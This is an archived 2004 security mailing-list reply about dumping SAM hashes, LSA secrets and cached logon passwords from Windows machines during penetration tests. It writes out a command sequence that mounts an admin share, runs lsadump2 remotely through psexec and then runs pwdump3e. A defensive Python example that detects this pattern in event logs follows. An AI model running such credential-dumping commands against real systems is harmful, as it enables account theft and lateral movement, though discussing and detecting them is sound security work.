Re: Cached NT/W2k passwords

From: Kurt Grutzmacher (grutz@jingojango.net)
Date: Sun May 23 2004 - 17:05:54 EDT


> You can get the password of the currently logged in user with Cain.
> It's the easiest method to dump all the passwords in the system,
> including the passwords in the protected storage component of Windows.

Correct, but not complete. Abel (the remote part of Cain) only pulls the
SAM table (pwdump) and LSA secrets (lsadump). It also requires that Abel
be installed and running which can be a boundary issue from a
tester/client relationship. I like its additional features but, IMHO,
it's a bit more cumbersome to install. I'm not a big fan of losing
control over installation (point-and-click).

If you're trying to keep things off of a client's machine that could be
used by a separate party (like Abel) then you're better off doing
something like this:

net use z: \\server\c$ pw /u:administrator
copy lsadump2.exe z:\
copy dumplsa.dll z:\
psexec \\server c:\lsadump2
del z:\lsadump2.exe z:\dumplsa.dll
pwdump3e server

Yeah, you've got the admin password and it may have been insanely easy
to get -- but you're not installing a listening package like Abel that
could be controlled by an outsider. The only thing left on the remote
machine is PSEXECSVC.EXE which can be done away with rather easily.

I think the original poster (and many others like us :-) want to find
the cached Windows logon passwords. It used to be in lsass memory but an
upcoming patch is going to "fix" it. It's got to be stored somewhere
since XP/2003 must be backwards compatible.
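The admin-share mount followed by a psexec-style service install described above leaves a recognisable footprint on the target. The following is an added detection example, not code from the poster or the list: it correlates Windows event 5140 (network share object accessed) against an administrative share with event 7045 (a service was installed) on the same host within a short window. The event records are constructed, simplified dicts rather than real EVTX exports, and the service name REMOTEXEC is hypothetical.

```python
from datetime import datetime, timedelta

# Constructed sample events (simplified dicts, not real EVTX exports).
# 5140 = network share object accessed (Security log),
# 7045 = a service was installed (System log).
SAMPLE_EVENTS = [
    {"time": "2004-05-23T16:58:02", "id": 5140, "host": "SERVER",
     "src_ip": "10.0.0.5", "share": r"\\*\C$", "user": "administrator"},
    {"time": "2004-05-23T16:58:40", "id": 7045, "host": "SERVER",
     "service": "REMOTEXEC", "image": r"C:\WINDOWS\remotexec.exe"},  # hypothetical
    {"time": "2004-05-23T17:30:00", "id": 5140, "host": "FILESRV",
     "src_ip": "10.0.0.9", "share": r"\\*\Public", "user": "jdoe"},
    {"time": "2004-05-23T18:05:00", "id": 7045, "host": "FILESRV",
     "service": "Spooler", "image": r"C:\WINDOWS\system32\spoolsv.exe"},
]


def is_admin_share(share):
    """True for ADMIN$ or a drive-letter share such as C$ (the share seen in 5140)."""
    name = share.rsplit("\\", 1)[-1].upper()
    return name == "ADMIN$" or (len(name) == 2 and name[0].isalpha() and name[1] == "$")


def _t(event):
    return datetime.fromisoformat(event["time"])


def detect_remote_exec(events, window=timedelta(minutes=10)):
    """Return one alert per service install (7045) that was preceded, on the same
    host and within `window`, by an access to an administrative share (5140).
    That ordering is the trace left by mounting C$ and then launching a service
    remotely; an ordinary service install with no prior admin-share access is ignored."""
    events = sorted(events, key=_t)
    alerts = []
    for svc in (e for e in events if e["id"] == 7045):
        for share_ev in events:
            if share_ev["id"] != 5140 or share_ev["host"] != svc["host"]:
                continue
            if not is_admin_share(share_ev["share"]):
                continue
            lag = _t(svc) - _t(share_ev)
            if timedelta(0) <= lag <= window:
                alerts.append({"host": svc["host"], "src_ip": share_ev["src_ip"],
                               "user": share_ev["user"], "service": svc["service"],
                               "image": svc["image"], "lag_seconds": int(lag.total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_exec(SAMPLE_EVENTS):
        print(alert)
```

Tuning the window and whitelisting known service installers is what keeps this from paging on routine administration.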



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:55 EDT